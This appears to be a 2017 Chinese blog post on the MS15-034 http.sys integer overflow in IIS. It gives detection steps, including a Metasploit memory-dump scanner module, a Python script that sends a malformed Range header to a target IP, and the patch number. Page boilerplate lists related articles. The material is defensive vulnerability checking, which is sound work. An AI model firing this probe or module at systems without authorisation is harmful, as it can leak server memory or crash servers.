http.sys远程代码注入漏洞

原创 2017年07月05日 16:41:28

http.sys是一个位于Win2003和WinXP SP2中的操作系统核心组件,能够让任何应用程序通过它提供的接口,以http协议进行信息通讯。

主要存在于在Windows+IIS环境下,影响了包括Windows 7、Windows Server 2008 R2、Windows 8、Windows Server 2012、Windows 8.1 和 Windows Server 2012 R2在内的主流服务器操作系统。

检测方法1:
msf下使用auxiliary/scanner/http/ms15_034_http_sys_memory_dump能够正常读取到内存数据即可确认包含该漏洞
检测方法2:

通过http返回信息包含416,Requested Range Not Satisfiable即可确认存在漏洞

检测脚本:

#此脚本仅适用于检测IIS服务器是否存在Http.sys 处理 Range 整数溢出漏洞,不适用于攻击使用。

import socket
import random

ipAddr = "10.66.150.253" #添加目标ip
hexAllFfff = "18446744073709551615"

req1 = "GET / HTTP/1.0\r\n\r\n"
req = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-" + hexAllFfff + "\r\n\r\n" #主要测试代码

print "[*] Audit Started"
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80)) #如果web服务器开启非80端口,可在此处修改为正确端口
client_socket.send(req1)
boringResp = client_socket.recv(1024)

if "Microsoft" not in boringResp:    #检测当前web服务是否为IIS web服务器
    print "[*] Not IIS"
    exit(0)
client_socket.close()
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client_socket.connect((ipAddr, 80))
client_socket.send(req)
goodResp = client_socket.recv(1024)
if "Requested Range Not Satisfiable" in goodResp:
#通过查看服务器返回判断是否存在该漏洞,根据打印出的结果判断:
#Looks VULN为存在该漏洞,Looks Patched为已打补丁,其他情况会返回Unexpected response
    print "[!!] Looks VULN"
elif "The request has an invalid header name" in goodResp:
    print "[*] Looks Patched"
else:
    print "[*] Unexpected response, cannot discern patch status"

修复方案:

更新补丁KB3042553。

版权声明:本文为博主原创文章,未经博主允许不得转载。

4.漏洞验证系列--MS15-034 HTTP协议栈整数溢出

使用msf中的漏洞模块msf > use auxiliary/scanner/http/ms15_034_http_sys_memory_dump msf auxiliary(scanner/htt...
  • archersaber39
  • archersaber39
  • 2017年12月29日 15:30
  • 52

metasploit - auxiliary

msf >use auxiliarys/ use auxiliary/admin/android/google_play_store_uxss_xframe_rce use auxiliary/adm...
  • u011130746
  • u011130746
  • 2015年04月20日 12:19
  • 2930

metasploit使用辅助模块

显示所有的辅助模块: msf > show auxiliary Auxiliary ========= Name ...
  • feier7501
  • feier7501
  • 2013年05月15日 22:12
  • 9097

HTTP协议详解(真的很牛逼)

转自:http://blog.csdn.net/gueter/archive/2007/03/08/1524447.aspx 引言 HTTP是一个属于应用层的面向对象的协议,由于其...
  • Scenlyf
  • Scenlyf
  • 2016年10月23日 20:54
  • 656

http 漏洞解决办法

HTTP协议Content Lenth限制漏洞导致拒绝服务攻击 漏洞描述:   在HTTP协议中,当使用POST方法时,可以设置ContentLenth来定义需要传送的数据长度,但是HTT...
  • ljh_learn_from_base
  • ljh_learn_from_base
  • 2017年08月06日 20:15
  • 223

IIS7 HTTP.sys漏洞深入分析

http.sys漏洞影响范围 随着各方的深入分析,各地域受Windows HTTP.sys漏洞影响的情况正在逐渐浮出水面。昨天的通告信息中提到Http.sys是Microsoft Windows处理...
  • gnaw0725
  • gnaw0725
  • 2015年04月18日 21:03
  • 3096

20150415,微软4月15日发布11个安全补丁

大家好,我们是微软大中华区安全支持团队。微软于北京时间2015年4月15日发布了11个新的安全公告,其中4个为严重等级,7个为重要等级,修复了Microsoft Windows、Microsoft O...
  • MSSecurity
  • MSSecurity
  • 2015年04月16日 14:08
  • 1629

Bash Shellshock(Bash远程代码执行)漏洞分析及利用思路

今日爆出一个Bash的RCE漏洞,威力巨大。看了看老外的分析,觉得有必要写一写自己对这个漏洞的理解。 首先,问题起因于一个命令ENV。 原型: env [OPTION]... [NAME=VALU...
  • u011721501
  • u011721501
  • 2014年09月25日 21:01
  • 7698

百度杀毒老版本的一款sys漏洞(源码),可注入任何进程

  • 2016年08月11日 22:34
  • 1.07MB
  • 下载

Cisco IOS HTTP Server代码注入漏洞详细分析与渗透测试

Cisco IOS HTTP Server代码注入漏洞详细分析与渗透测试 2006-07-31 9:32 原始连接:http://www.infohacking.com/INFOHACKING_R...
  • foj5678
  • foj5678
  • 2012年03月15日 09:20
  • 480
内容举报
返回顶部
收藏助手
不良信息举报
您举报文章:http.sys远程代码注入漏洞
举报原因:
原因补充:

(最多只允许输入30个字)